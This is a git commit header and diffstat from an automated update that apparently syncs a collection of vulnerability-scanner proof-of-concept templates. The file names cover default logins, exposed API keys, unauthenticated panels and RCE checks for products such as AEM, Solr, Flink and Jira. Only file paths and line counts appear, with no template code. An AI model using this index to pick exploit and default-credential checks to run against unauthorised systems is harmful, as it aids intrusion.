From 05abcfe8e41ff9af5c6b92a0143a211c98710b88 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 27 May 2024 12:33:40 +0000 Subject: [PATCH] 20240527 --- date.txt | 2 +- poc.txt | 2946 +- poc/adobe/adobe-coldfusion-detect-82.yaml | 68 - poc/adobe/adobe-coldfusion-detect.yaml | 62 + .../adobe-coldfusion-error-detect-86.yaml | 7 +- ... => adobe-coldfusion-error-detect-88.yaml} | 0 poc/adobe/adobe-component-login-89.yaml | 32 + poc/adobe/adobe-component-login-90.yaml | 31 - poc/adobe/adobe-connect-central-login-95.yaml | 30 - poc/adobe/adobe-connect-central-login.yaml | 6 +- .../adobe-connect-username-exposure-100.yaml | 27 - ...> adobe-connect-username-exposure-98.yaml} | 0 poc/adobe/adobe-connect-version-102.yaml | 32 + ...on.yaml => adobe-connect-version-104.yaml} | 0 .../adobe-experience-manager-login-105.yaml | 33 + .../adobe-experience-manager-login-106.yaml | 23 - poc/adobe/adobe-experience-manager-login.yaml | 15 +- poc/adobe/adobe-media-server-113.yaml | 55 +- poc/adobe/aem-bg-servlet-127.yaml | 23 - ...g-servlet.yaml => aem-bg-servlet-129.yaml} | 0 poc/adobe/aem-crx-bypass-134.yaml | 6 - poc/adobe/aem-default-get-servlet-135.yaml | 91 - poc/adobe/aem-default-get-servlet-137.yaml | 78 + poc/adobe/aem-default-get-servlet.yaml | 14 +- poc/adobe/aem-default-login-140.yaml | 56 + poc/adobe/aem-default-login-142.yaml | 21 +- poc/adobe/aem-detaction.yaml | 26 - poc/adobe/aem-detection-144.yaml | 28 + poc/adobe/aem-detection-145.yaml | 28 - poc/adobe/aem-detection.yaml | 16 +- poc/adobe/aem-gql-servlet-147.yaml | 55 + poc/adobe/aem-gql-servlet-149.yaml | 56 - poc/adobe/aem-gql-servlet.yaml | 15 +- poc/adobe/aem-groovyconsole-151.yaml | 18 +- poc/adobe/aem-groovyconsole-153.yaml | 37 + poc/adobe/aem-jcr-querybuilder-164.yaml | 54 +- poc/adobe/aem-login-status-170.yaml | 24 + ...-status-171.yaml => aem-login-status.yaml} | 0 poc/adobe/aem-merge-metadata-servlet-172.yaml | 30 - poc/adobe/aem-merge-metadata-servlet.yaml | 24 + poc/adobe/aem-querybuilder-feed-servlet.yaml | 23 - ...-querybuilder-internal-path-read-179.yaml} | 0 .../aem-querybuilder-json-servlet-182.yaml | 42 + .../aem-querybuilder-json-servlet-186.yaml | 60 +- .../aem-querybuilder-json-servlet-187.yaml | 16 +- poc/adobe/aem-userinfo-servlet-193.yaml | 19 +- ...l => aem-wcm-suggestions-servlet-196.yaml} | 0 .../airflow-configuration-exposure-230.yaml | 28 - .../airflow-configuration-exposure.yaml | 16 + poc/airflow/airflow-default-login-236.yaml | 21 +- poc/airflow/airflow-detect-239.yaml | 24 + ...ow-detect-240.yaml => airflow-detect.yaml} | 0 poc/airflow/airflow-panel-244.yaml | 7 +- .../unauthenticated-airflow-10884.yaml | 27 + .../unauthenticated-airflow-10886.yaml | 2 +- poc/apache/Apache-NiFi-rce.yaml | 2 - poc/apache/apache-apisix-panel-337.yaml | 25 - poc/apache/apache-apisix-panel-338.yaml | 30 + poc/apache/apache-detect-348.yaml | 30 - poc/apache/apache-filename-enum-354.yaml | 36 + poc/apache/apache-filename-enum.yaml | 30 - poc/apache/apache-flink-unauth-rce-355.yaml | 23 +- poc/apache/apache-flink-unauth-rce-356.yaml | 39 + poc/apache/apache-guacamole-361.yaml | 32 - poc/apache/apache-guacamole.yaml | 28 + poc/apache/apache-nifi-rce.yaml | 36 + poc/apache/apache-ofbiz-log4j-rce-366.yaml | 33 - poc/apache/apache-ofbiz-log4j-rce.yaml | 28 + .../apache-solr-log4j-CVE-2021-44228.yaml | 7 +- .../apache-solr-log4j-cve-2021-44228.yaml | 17 + poc/apache/apache-solr-log4j-rce-372.yaml | 36 - poc/apache/apache-solr-log4j-rce.yaml | 63 +- poc/apache/apache-storm-unauth.yaml | 13 +- poc/apache/apache-tomcat-snoop-374.yaml | 7 +- poc/apache/apache-tomcat-snoop-377.yaml | 25 + poc/apache/apachesolrlfissrf.yaml | 53 +- poc/apache/default-apache-test-all-6813.yaml | 29 + poc/apache/default-apache-test-all-6814.yaml | 10 +- ...6815.yaml => default-apache-test-all.yaml} | 0 poc/apache/default-apache-test-page-6818.yaml | 5 +- poc/apache/default-apache-test-page.yaml | 17 + .../default-apache2-ubuntu-page-6810.yaml | 6 +- poc/apache/default-apache2-ubuntu-page.yaml | 17 + poc/api/alfacgiapi-wordpress-255.yaml | 2 - poc/api/apache-apisix-panel-337.yaml | 25 - poc/api/apache-apisix-panel-338.yaml | 30 + poc/api/api-abuseipdb-384.yaml | 41 + poc/api/api-abuseipdb.yaml | 31 - poc/api/api-adafruit-io-387.yaml | 30 + poc/api/api-adafruit-io.yaml | 24 - ...vault-390.yaml => api-alienvault-389.yaml} | 0 poc/api/api-alienvault.yaml | 26 - poc/api/api-apigee-edge-391.yaml | 36 + poc/api/api-apigee-edge.yaml | 29 - poc/api/api-appveyor-392.yaml | 31 + poc/api/api-appveyor.yaml | 25 - poc/api/api-asana-393.yaml | 14 +- poc/api/api-bingmaps-395.yaml | 20 - poc/api/api-bingmaps.yaml | 1 + poc/api/api-bitly-396.yaml | 6 +- poc/api/api-bitly.yaml | 20 + poc/api/api-blockchain-398.yaml | 35 + poc/api/api-blockchain.yaml | 27 - ...-buildkite.yaml => api-buildkite-402.yaml} | 0 poc/api/api-buttercms.yaml | 19 + poc/api/api-calendly-404.yaml | 11 +- poc/api/api-calendly.yaml | 20 - poc/api/api-circleci-405.yaml | 10 +- ...pi-circleci-406.yaml => api-circleci.yaml} | 0 poc/api/api-clearbit-407.yaml | 33 - poc/api/api-clearbit.yaml | 28 + poc/api/api-cooperhewitt-411.yaml | 10 +- poc/api/api-covalent-412.yaml | 31 + poc/api/api-covalent.yaml | 26 - poc/api/api-debounce-414.yaml | 30 + poc/api/api-debounce.yaml | 25 - poc/api/api-dribbble-416.yaml | 10 +- ...pi-dribbble.yaml => api-dribbble-417.yaml} | 0 poc/api/api-dropbox.yaml | 20 - poc/api/api-europeana-419.yaml | 2 +- poc/api/api-europeana-421.yaml | 31 - poc/api/api-fastly-424.yaml | 25 + poc/api/api-fastly.yaml | 14 +- poc/api/api-fastly.yml | 21 - poc/api/api-fontawesome-426.yaml | 36 + poc/api/api-fontawesome.yaml | 29 - poc/api/api-fullhunt-428.yaml | 34 - poc/api/api-fullhunt.yaml | 29 + poc/api/api-gitlab-431.yaml | 9 +- poc/api/{api-gitlab.yaml => api-gitlab.yml} | 0 poc/api/api-heroku-435.yaml | 14 +- poc/api/api-hirak-rates-436.yaml | 32 + poc/api/api-hirak-rates.yaml | 27 - poc/api/api-hubspot-437.yaml | 26 +- poc/api/api-iconfinder-439.yaml | 34 - poc/api/api-iconfinder.yaml | 28 + poc/api/api-instagram.yaml | 10 +- poc/api/api-instatus-442.yaml | 34 - poc/api/api-instatus.yaml | 29 + poc/api/api-intercom-443.yaml | 30 + poc/api/api-intercom.yaml | 24 - poc/api/api-ipstack-444.yaml | 23 - poc/api/api-ipstack.yaml | 9 +- poc/api/api-iterable-445.yaml | 24 + poc/api/api-iterable.yaml | 11 +- poc/api/api-jumpcloud-446.yaml | 22 - poc/api/api-jumpcloud.yaml | 24 + poc/api/api-launchdarkly-449.yaml | 34 + poc/api/api-launchdarkly.yaml | 28 - poc/api/api-lokalise-452.yaml | 27 +- .../{api-loqate-453.yaml => api-loqate.yaml} | 0 poc/api/api-mailchimp-454.yaml | 3 +- poc/api/api-mailgun-455.yaml | 13 +- poc/api/api-malshare-456.yaml | 10 +- poc/api/api-malshare-457.yaml | 24 + poc/api/api-malwarebazaar.yaml | 40 + poc/api/api-mapbox.yaml | 19 + .../{api-mywot.yaml => api-mywot-467.yaml} | 0 poc/api/api-mywot-468.yaml | 10 +- poc/api/api-npm.yaml | 22 - poc/api/api-onelogin-472.yaml | 33 - poc/api/api-onelogin.yaml | 27 + ...nweather-473.yaml => api-openweather.yaml} | 0 poc/api/api-pagerduty-475.yaml | 13 +- poc/api/api-pastebin-477.yaml | 33 - poc/api/api-pastebin.yaml | 28 + poc/api/api-pendo-479.yaml | 14 +- poc/api/api-petfinder-480.yaml | 36 - poc/api/api-petfinder.yaml | 31 + poc/api/api-pinata-481.yaml | 33 + poc/api/api-pinata.yaml | 28 - poc/api/api-pivotaltracker.yaml | 22 + poc/api/api-quip-484.yaml | 32 - poc/api/api-quip.yaml | 27 + ...pi-scanii-487.yaml => api-scanii-488.yaml} | 0 poc/api/api-scanii.yaml | 26 + poc/api/api-sendgrid-489.yaml | 3 +- poc/api/api-slack-493.yaml | 7 +- poc/api/api-sonarcloud-494.yaml | 15 +- poc/api/api-spotify-495.yaml | 31 - poc/api/api-spotify.yaml | 25 + poc/api/api-square-496.yaml | 14 +- poc/api/api-square.yaml | 24 + poc/api/api-stripe-499.yaml | 13 +- poc/api/api-stripe.yaml | 20 + poc/api/api-stytch-500.yaml | 36 - poc/api/api-stytch.yaml | 31 + poc/api/api-tink-504.yaml | 31 + poc/api/api-tink.yaml | 25 - poc/api/api-tinypng-505.yaml | 12 +- poc/api/api-travisci.yaml | 22 - poc/api/api-twitter-507.yaml | 30 - poc/api/api-twitter.yaml | 24 + poc/api/api-urlscan-509.yaml | 34 + poc/api/api-virustotal-512.yaml | 13 +- ...irustotal-511.yaml => api-virustotal.yaml} | 0 poc/api/api-visualstudio-513.yaml | 32 + poc/api/api-visualstudio.yaml | 26 - ...pi-wakatime-514.yaml => api-wakatime.yaml} | 0 poc/api/api-wordcloud-517.yaml | 51 - poc/api/api-youtube-519.yaml | 28 - poc/api/api-youtube.yaml | 22 + poc/api/apiman-panel-460.yaml | 5 +- poc/api/apiman-panel-462.yaml | 30 + poc/api/apiman-panel-464.yaml | 32 + poc/api/apisix-default-login-490.yaml | 13 +- poc/api/apisix-default-login-491.yaml | 51 + poc/api/arcgis-rest-api-532.yaml | 32 - poc/api/arcgis-rest-api-533.yaml | 29 + poc/api/arcgis-rest-api.yaml | 15 +- poc/api/bems-api-lfi-707.yaml | 24 + ...api-lfi-711.yaml => bems-api-lfi-712.yaml} | 0 poc/api/burp-api-detect-810.yaml | 34 + poc/api/burp-api-detect.yaml | 28 - ...i.yaml => couchbase-buckets-api-1232.yaml} | 0 poc/api/couchbase-buckets-api-1233.yaml | 42 + poc/api/exposed-glances-api-7307.yaml | 6 +- poc/api/exposed-glances-api-7308.yaml | 29 - poc/api/exposed-glances-api-7309.yaml | 27 - poc/api/fastapi-docs-7398.yaml | 22 - poc/api/fastapi-docs.yaml | 13 +- poc/api/gitlab-api-user-enum-7668.yaml | 33 + poc/api/gitlab-api-user-enum-7669.yaml | 13 +- poc/api/gitlab-api-user-enum.yaml | 11 +- poc/api/google-api-7771.yaml | 16 - ...cd-unauthenticated-api-data-leak-8056.yaml | 28 - ...tp-etcd-unauthenticated-api-data-leak.yaml | 38 + poc/api/jenkins-api-panel-8261.yaml | 6 +- poc/api/jenkins-api-panel.yaml | 16 +- poc/api/kube-api-deployments-8503.yaml | 9 +- poc/api/kube-api-deployments.yaml | 22 + poc/api/kube-api-namespaces-8505.yaml | 9 +- poc/api/kube-api-namespaces-8506.yaml | 6 +- poc/api/kube-api-nodes-8508.yaml | 23 +- poc/api/kube-api-services-8514.yaml | 22 + poc/api/kube-api-services.yaml | 26 - poc/api/magento-2-exposed-api-8687.yaml | 21 +- poc/api/magento-2-exposed-api-8688.yaml | 9 +- ...p-api-11854.yaml => mailchimp-api(1).yaml} | 0 poc/api/mailchimp-api.yaml | 4 - poc/api/mailgun-api.yaml | 3 +- poc/api/pictatic-api-key.yaml | 5 +- poc/api/sendgrid-api-11859.yaml | 3 - ...10140.yaml => sendgrid-api-key-10142.yaml} | 0 poc/api/sendgrid-api-key.yaml | 15 + poc/api/slack-api(1).yaml | 16 + poc/api/slack-api-11864.yaml | 13 - poc/api/slack-api.yaml | 4 - poc/api/strapi-cms-detect-10539.yaml | 3 +- poc/api/strapi-cms-detect.yaml | 31 - poc/api/strapi-page-10546.yaml | 20 + ...trapi-page-10544.yaml => strapi-page.yaml} | 0 poc/api/stripe-api-key(1).yaml | 16 - poc/api/stripe-api-key-11869.yaml | 13 + poc/api/stripe-api-key.yaml | 3 +- poc/api/swagger-api-10591.yaml | 6 +- poc/api/swagger-api-10594.yaml | 68 + poc/api/swagger-api-10595.yaml | 66 - poc/api/twilio-api-10860.yaml | 13 - poc/api/twilio-api-10861.yaml | 16 + poc/api/unauth-spark-api-10964.yaml | 8 + poc/api/unauth-spark-api-10965.yaml | 12 +- poc/api/wadl-api-11082.yaml | 20 +- poc/api/wadl-api-11083.yaml | 16 +- poc/api/wadl-api-11084.yaml | 40 - poc/api/yapi-detect-11720.yaml | 21 + poc/api/yapi-detect-11721.yaml | 11 +- poc/api/yapi-rce-11724.yaml | 35 +- poc/api/yapi-rce-11725.yaml | 93 + poc/atlassian/atlassian-crowd-panel-580.yaml | 17 +- poc/atlassian/atlassian-crowd-panel-583.yaml | 25 + poc/atlassian/atlassian-crowd-panel-584.yaml | 19 - poc/atlassian/atlassian-crowd-panel-585.yaml | 9 +- .../confluence-ssrf-sharelinks-1191.yaml | 31 +- .../confluence-ssrf-sharelinks-1192.yaml | 44 + .../confluence-ssrf-sharelinks-1193.yaml | 36 - poc/atlassian/jira-detect-8314.yaml | 41 + .../jira-service-desk-signup-8317.yaml | 21 + .../jira-service-desk-signup-8320.yaml | 2 +- .../jira-service-desk-signup-8321.yaml | 20 - .../jira-unauthenticated-dashboards-8323.yaml | 11 +- .../jira-unauthenticated-dashboards-8324.yaml | 14 +- ...nauthenticated-installed-gadgets-8328.yaml | 14 +- ...nauthenticated-installed-gadgets-8330.yaml | 10 +- ...-unauthenticated-popular-filters-8331.yaml | 23 - .../jira-unauthenticated-popular-filters.yaml | 5 +- .../jira-unauthenticated-projects-8335.yaml | 25 - .../jira-unauthenticated-projects.yaml | 16 + .../jira-unauthenticated-screens-8338.yaml | 39 + .../jira-unauthenticated-screens.yaml | 27 - ... => jira-unauthenticated-user-picker.yaml} | 0 poc/auth/GT-AC2900-login.yaml | 5 +- poc/auth/JeeSite-default-login.yaml | 5 +- poc/auth/acemanager-login-23.yaml | 40 + poc/auth/acemanager-login-25.yaml | 9 +- poc/auth/acemanager-login.yaml | 70 +- poc/auth/activemq-default-login-47.yaml | 34 +- ...in-44.yaml => activemq-default-login.yaml} | 0 poc/auth/adobe-component-login-89.yaml | 32 + poc/auth/adobe-component-login-90.yaml | 31 - poc/auth/adobe-connect-central-login-95.yaml | 30 - poc/auth/adobe-connect-central-login.yaml | 6 +- .../adobe-experience-manager-login-105.yaml | 33 + .../adobe-experience-manager-login-106.yaml | 23 - poc/auth/adobe-experience-manager-login.yaml | 15 +- poc/auth/aem-default-login-140.yaml | 56 + poc/auth/aem-default-login-142.yaml | 21 +- poc/auth/aem-login-status-170.yaml | 24 + ...-status-171.yaml => aem-login-status.yaml} | 0 poc/auth/aims-password-mgmt-client-218.yaml | 27 + poc/auth/aims-password-mgmt-client-219.yaml | 17 + poc/auth/aims-password-mgmt-client-221.yaml | 17 - poc/auth/aims-password-mgmt-client.yaml | 2 +- poc/auth/aims-password-portal-222.yaml | 32 - poc/auth/aims-password-portal-224.yaml | 14 +- poc/auth/airflow-default-login-236.yaml | 21 +- poc/auth/alibaba-mongoshake-unauth-268.yaml | 27 + poc/auth/alibaba-mongoshake-unauth-270.yaml | 10 +- poc/auth/alphaweb-default-login-275.yaml | 45 + poc/auth/alphaweb-default-login-277.yaml | 14 +- poc/auth/amazon-mws-auth-token-11845.yaml | 23 - poc/auth/amazon-mws-auth-token-283.yaml | 11 +- poc/auth/amazon-mws-auth-token.yaml | 16 + poc/auth/ambari-default-login-287.yaml | 35 + poc/auth/ambari-default-login-289.yaml | 7 +- poc/auth/ambari-default-login-290.yaml | 11 +- poc/auth/amcrest-login-296.yaml | 37 + poc/auth/amcrest-login-297.yaml | 28 - poc/auth/amcrest-login.yaml | 15 +- poc/auth/ametys-admin-login-300.yaml | 39 - poc/auth/ametys-admin-login-301.yaml | 31 + poc/auth/ametys-admin-login.yaml | 12 +- poc/auth/apache-flink-unauth-rce-355.yaml | 23 +- poc/auth/apache-flink-unauth-rce-356.yaml | 39 + poc/auth/apache-storm-unauth.yaml | 13 +- poc/auth/apc-ups-login-381.yaml | 15 +- ...-ups-login-382.yaml => apc-ups-login.yaml} | 0 poc/auth/api-onelogin-472.yaml | 33 - poc/auth/api-onelogin.yaml | 27 + poc/auth/apisix-default-login-490.yaml | 13 +- poc/auth/apisix-default-login-491.yaml | 51 + poc/auth/apollo-default-login-520.yaml | 4 +- poc/auth/apple-app-site-association-524.yaml | 34 + poc/auth/apple-app-site-association-525.yaml | 22 +- poc/auth/apple-app-site-association-526.yaml | 4 +- poc/auth/argocd-login.yaml | 19 - poc/auth/arl-default-password.yaml | 4 + poc/auth/atvise-login-590.yaml | 8 +- ...l => avatier-password-management-604.yaml} | 0 poc/auth/avatier-password-management-605.yaml | 10 +- poc/auth/aws-opensearch-login-649.yaml | 24 + poc/auth/aws-opensearch-login-650.yaml | 25 - .../axiom-digitalocean-key-exposure-666.yaml | 41 - ... axiom-digitalocean-key-exposure-668.yaml} | 0 poc/auth/azkaban-default-login-674.yaml | 47 + poc/auth/azkaban-default-login.yaml | 53 - poc/auth/basic-auth-detection-688.yaml | 45 +- ...r-login-700.yaml => bazarr-login-703.yaml} | 0 poc/auth/beyondtrust-login-server-719.yaml | 31 + poc/auth/bigbluebutton-login-725.yaml | 34 + poc/auth/bigbluebutton-login-726.yaml | 28 - poc/auth/bigbluebutton-login.yaml | 6 +- poc/auth/blue-iris-login-753.yaml | 15 +- poc/auth/blue-iris-login-754.yaml | 13 +- poc/auth/braintree-access-token.yaml | 17 - poc/auth/branch-key-774.yaml | 17 - poc/auth/branch-key-775.yaml | 18 + poc/auth/branch-key.yaml | 14 +- poc/auth/brother-unauthorized-access-792.yaml | 25 - poc/auth/brother-unauthorized-access.yaml | 50 +- ...sinessintelligence-default-login-814.yaml} | 0 .../businessintelligence-default-login.yaml | 55 - poc/auth/camunda-login-panel.yaml | 20 +- poc/auth/canal-default-login-848.yaml | 2 +- poc/auth/cas-login.yaml | 16 +- poc/auth/chinaunicom-default-login-908.yaml | 6 +- poc/auth/chinaunicom-default-login-909.yaml | 33 + ...-938.yaml => cisco-finesse-login-940.yaml} | 0 poc/auth/cisco-finesse-login.yaml | 16 +- ...3.yaml => cisco-integrated-login-941.yaml} | 0 poc/auth/cisco-systems-login-975.yaml | 15 +- poc/auth/cisco-systems-login.yaml | 27 +- poc/auth/cisco-ucs-kvm-login-979.yaml | 27 + poc/auth/cisco-ucs-kvm-login-980.yaml | 28 - ...el-994.yaml => clave-login-panel-996.yaml} | 0 poc/auth/clickhouse-unauth-1002.yaml | 30 + poc/auth/clickhouse-unauth-1003.yaml | 3 +- poc/auth/cobbler-default-login.yaml | 59 + poc/auth/codian-mcu-login-1139.yaml | 34 - poc/auth/codian-mcu-login-1140.yaml | 7 +- .../coldfusion-administrator-login-1145.yaml | 26 - poc/auth/coldfusion-administrator-login.yaml | 18 +- .../commax-credentials-disclosure-1158.yaml | 7 +- poc/auth/comtrend-password-exposure-1166.yaml | 7 +- poc/auth/cortex-xsoar-login-1225.yaml | 23 + poc/auth/cortex-xsoar-login-1227.yaml | 24 - poc/auth/cortex-xsoar-login.yaml | 17 +- poc/auth/credential-exposure-file.yaml | 721 - poc/auth/credentials-1257.yaml | 16 - poc/auth/credentials-1258.yaml | 16 + poc/auth/credentials-disclosure-1256.yaml | 4139 +- ...-1252.yaml => credentials-disclosure.yaml} | 0 poc/auth/crush-ftp-login-1273.yaml | 22 - poc/auth/crush-ftp-login-1275.yaml | 23 + poc/auth/crush-ftp-login.yaml | 3 +- ... => cs-cart-unauthenticated-lfi-1281.yaml} | 0 .../cs-cart-unauthenticated-lfi-1285.yaml | 7 +- poc/auth/cs141-default-login-1277.yaml | 55 - poc/auth/cs141-default-login-1278.yaml | 44 + poc/auth/cs141-default-login-1279.yaml | 9 +- poc/auth/dbeaver-credentials-6780.yaml | 26 + poc/auth/dbeaver-credentials-6781.yaml | 11 +- poc/auth/dbeaver-credentials-6782.yaml | 25 - poc/auth/dell-idrac-default-login-6943.yaml | 9 +- poc/auth/dell-idrac-default-login-6945.yaml | 32 +- poc/auth/dell-idrac-default-login-6946.yaml | 24 - poc/auth/dell-idrac9-default-login-6932.yaml | 37 - poc/auth/dell-idrac9-default-login-6933.yaml | 36 +- poc/auth/dell-openmanager-login-6949.yaml | 27 - poc/auth/dell-openmanager-login.yaml | 20 +- poc/auth/dell-wyse-login-6954.yaml | 24 - poc/auth/dell-wyse-login-6955.yaml | 7 +- poc/auth/django-secret-key.yaml | 31 + poc/auth/django-secret.key.yaml | 62 - .../dolphinscheduler-default-login-7072.yaml | 10 +- .../dolphinscheduler-default-login-7073.yaml | 42 - poc/auth/dubbo-admin-default-login-7120.yaml | 48 + poc/auth/dubbo-admin-default-login.yaml | 41 - poc/auth/dvwa-default-login-7127.yaml | 2 +- poc/auth/dvwa-default-login-7129.yaml | 18 +- .../dvwa-headless-automatic-login-7130.yaml | 7 +- .../dvwa-headless-automatic-login-7131.yaml | 42 + .../dvwa-headless-automatic-login-7133.yaml | 9 + poc/auth/dynatrace-token-7145.yaml | 5 +- poc/auth/dynatrace-token.yaml | 13 +- poc/auth/ems-login-panel-7223.yaml | 6 +- poc/auth/ems-login-panel.yaml | 17 +- .../enable-secret-for-password-user-and-.yaml | 4 +- poc/auth/epmp-login-7230.yaml | 21 - poc/auth/epmp-login.yaml | 22 + poc/auth/etcd-keys-7261.yaml | 25 + poc/auth/etcd-keys-7262.yaml | 26 + poc/auth/etcd-keys.yaml | 6 +- poc/auth/exacqvision-default-login-7274.yaml | 8 +- poc/auth/exacqvision-default-login-7277.yaml | 51 + .../exposed-authentication-asmx-7288.yaml | 7 +- poc/auth/exposed-authentication-asmx.yaml | 20 + poc/auth/facebook-secret-11849.yaml | 16 + poc/auth/facebook-secret-7386.yaml | 16 - poc/auth/faraday-login-7395.yaml | 24 + poc/auth/faraday-login-7396.yaml | 8 +- poc/auth/fcm-server-key-7452.yaml | 17 - poc/auth/fcm-server-key-7454.yaml | 19 + poc/auth/fcm-server-key.yaml | 11 +- ...fireware-xtm-user-authentication-7501.yaml | 23 + ...fireware-xtm-user-authentication-7503.yaml | 23 - .../fireware-xtm-user-authentication.yaml | 13 +- poc/auth/flir-default-login-7516.yaml | 2 +- poc/auth/flir-default-login.yaml | 42 + poc/auth/frp-default-login-7557.yaml | 21 +- ...login.yaml => frp-default-login-7559.yaml} | 0 poc/auth/ftp-credentials-exposure-7568.yaml | 37 - poc/auth/ftp-credentials-exposure.yaml | 22 + poc/auth/ftp-default-credentials.yaml | 55 +- poc/auth/ftp-default-creds.yaml | 30 - poc/auth/ftp-weak-credentials-7569.yaml | 18 +- poc/auth/ftp-weak-credentials.yaml | 23 +- ...n.yaml => fuelcms-default-login-7571.yaml} | 0 poc/auth/fuelcms-default-login-7572.yaml | 48 - poc/auth/general-tokens-7580.yaml | 7 +- poc/auth/general-tokens-7584.yaml | 42 - poc/auth/geoserver-default-login-7593.yaml | 10 +- poc/auth/geoserver-default-login-7594.yaml | 41 + poc/auth/geoserver-default-login.yaml | 42 + poc/auth/git-credentials-7643.yaml | 24 - poc/auth/git-credentials-7644.yaml | 24 + poc/auth/gitea-login-7646.yaml | 9 +- poc/auth/github-personal-token.yaml | 7 +- poc/auth/gitlab-public-signup-7681.yaml | 31 + poc/auth/gitlab-public-signup-7684.yaml | 7 +- poc/auth/gitlab-public-signup.yaml | 11 +- .../gitlab-uninitialized-password-7695.yaml | 17 +- poc/auth/gitlab-weak-login-7705.yaml | 51 + poc/auth/gitlab-weak-login-7706.yaml | 11 +- poc/auth/gitlab-weak-login-7707.yaml | 12 +- poc/auth/gloo-unauth-7722.yaml | 12 +- poc/auth/glpi-authentication-7727.yaml | 25 - poc/auth/glpi-authentication-7730.yaml | 21 + ...i-login-7735.yaml => glpi-login-7737.yaml} | 0 poc/auth/gocd-encryption-key.yaml | 8 +- ...gin.yaml => google-earth-dlogin-7780.yaml} | 0 poc/auth/google-earth-dlogin-7781.yaml | 17 +- ...ebook-secrets.yaml => google-secrets.yaml} | 0 poc/auth/gophish-default-login-7792.yaml | 14 +- poc/auth/gophish-default-login.yaml | 50 - poc/auth/gophish-login-7795.yaml | 5 +- poc/auth/grafana-default-login-7801.yaml | 24 +- poc/auth/grafana-default-login-7804.yaml | 55 + poc/auth/grafana-public-signup-7816.yaml | 35 + poc/auth/grafana-public-signup.yaml | 7 +- poc/auth/gt-ac2900-login.yaml | 23 - poc/auth/guacamole-default-login-7858.yaml | 16 +- poc/auth/guacamole-default-login-7859.yaml | 38 - poc/auth/guacamole-default-login-7861.yaml | 12 +- poc/auth/hadoop-unauth-7875.yaml | 9 +- poc/auth/hadoop-unauth-7877.yaml | 25 - poc/auth/hivemanager-login-panel-7965.yaml | 18 - poc/auth/hongdian-default-login-7997.yaml | 10 +- poc/auth/hongdian-default-login-7998.yaml | 10 - .../hp-ilo-serial-key-disclosure-8024.yaml | 4 - .../hp-ilo-serial-key-disclosure-8025.yaml | 37 + poc/auth/hp-switch-default-login.yaml | 29 - .../hpe-system-management-login-8014.yaml | 27 - .../hpe-system-management-login-8016.yaml | 27 + poc/auth/hpe-system-management-login.yaml | 4 +- poc/auth/hrsale-unauthenticated-lfi-8039.yaml | 33 + poc/auth/hrsale-unauthenticated-lfi.yaml | 20 - poc/auth/htpasswd-detection-8046.yaml | 25 - ...cd-unauthenticated-api-data-leak-8056.yaml | 28 - ...tp-etcd-unauthenticated-api-data-leak.yaml | 38 + .../huawei-HG532e-default-router-login.yaml | 8 - ...awei-hg532e-default-router-login-8064.yaml | 30 - poc/auth/huawei-router-auth-bypass-8073.yaml | 10 +- poc/auth/huawei-router-auth-bypass-8076.yaml | 37 + poc/auth/hue-default-credential-8080.yaml | 23 +- poc/auth/hue-default-credential-8081.yaml | 8 +- poc/auth/ibm-mqseries-default-login-8106.yaml | 51 + poc/auth/ibm-mqseries-default-login-8107.yaml | 39 - poc/auth/ibm-note-login-8110.yaml | 23 - poc/auth/ibm-note-login-8111.yaml | 24 + poc/auth/ibm-note-login.yaml | 16 +- .../ibm-storage-default-credential-8124.yaml | 12 +- .../ibm-storage-default-credential-8125.yaml | 21 +- poc/auth/icinga-web-login-8134.yaml | 3 +- poc/auth/icinga-web-login-8136.yaml | 23 - poc/auth/icinga-web-login-8137.yaml | 23 + ...spur-clusterengine-default-login-8162.yaml | 14 +- .../inspur-clusterengine-default-login.yaml | 39 + poc/auth/intelbras-login.yaml | 23 +- poc/auth/iptime-default-login-8193.yaml | 42 - poc/auth/jenkins-default-login.yaml | 42 + poc/auth/jenkins-login-8277.yaml | 27 - poc/auth/jenkins-login-8279.yaml | 26 + poc/auth/jenkins-login.yaml | 12 +- poc/auth/jenkins-weak-password.yaml | 87 +- ...l => jfrog-unauth-build-exposed-8299.yaml} | 0 poc/auth/jinher-oa-default-login-8311.yaml | 10 +- poc/auth/jinher-oa-default-login-8312.yaml | 52 - poc/auth/jira-service-desk-signup-8317.yaml | 21 + poc/auth/jira-service-desk-signup-8320.yaml | 2 +- poc/auth/jira-service-desk-signup-8321.yaml | 20 - .../jira-unauthenticated-dashboards-8323.yaml | 11 +- .../jira-unauthenticated-dashboards-8324.yaml | 14 +- ...nauthenticated-installed-gadgets-8328.yaml | 14 +- ...nauthenticated-installed-gadgets-8330.yaml | 10 +- ...-unauthenticated-popular-filters-8331.yaml | 23 - .../jira-unauthenticated-popular-filters.yaml | 5 +- .../jira-unauthenticated-projects-8335.yaml | 25 - poc/auth/jira-unauthenticated-projects.yaml | 16 + .../jira-unauthenticated-screens-8338.yaml | 39 + poc/auth/jira-unauthenticated-screens.yaml | 27 - .../jira-unauthenticated-user-picker.yaml | 15 + poc/auth/jmx-default-login-8355.yaml | 38 - poc/auth/jmx-default-login.yaml | 42 + .../jolokia-unauthenticated-lfi-8364.yaml | 2 +- poc/auth/jolokia-unauthenticated-lfi.yaml | 26 - poc/auth/jupyter-ipython-unauth-8402.yaml | 21 + poc/auth/jupyter-ipython-unauth-8405.yaml | 20 +- poc/auth/kafka-center-default-login-8416.yaml | 42 + poc/auth/kafka-center-default-login-8417.yaml | 13 +- poc/auth/kafka-center-login-8418.yaml | 2 +- poc/auth/kafka-center-login.yaml | 17 +- poc/auth/kenesto-login-8444.yaml | 22 - poc/auth/kenesto-login-8445.yaml | 26 + poc/auth/kenesto-login.yaml | 22 +- poc/auth/key-cloak-admin-panel-8470.yaml | 16 +- poc/auth/key-cloak-admin-panel.yaml | 14 +- poc/auth/keycloak-json-8473.yaml | 29 + poc/auth/keycloak-json-8474.yaml | 5 +- ....yaml => keycloak-openid-config-8475.yaml} | 0 poc/auth/keycloak-openid-config.yaml | 26 + poc/auth/keycloak-xss-8480.yaml | 28 - poc/auth/kiwitcms-login-8496.yaml | 26 + poc/auth/kiwitcms-login-8497.yaml | 23 - poc/auth/kiwitcms-login.yaml | 16 +- poc/auth/kubeflow-dashboard-unauth-8515.yaml | 16 +- ...-unauth(1).yaml => kubernetes-unauth.yaml} | 0 ...n-network-credentials-disclosure-8556.yaml | 32 + .../kyan-network-credentials-disclosure.yaml | 12 +- poc/auth/linksys-wifi-login.yaml | 21 +- poc/auth/lucee-login-8662.yaml | 21 - poc/auth/lucee-login-8664.yaml | 4 +- poc/auth/maian-cart-preauth-rce-8721.yaml | 51 + poc/auth/maian-cart-preauth-rce.yaml | 15 +- 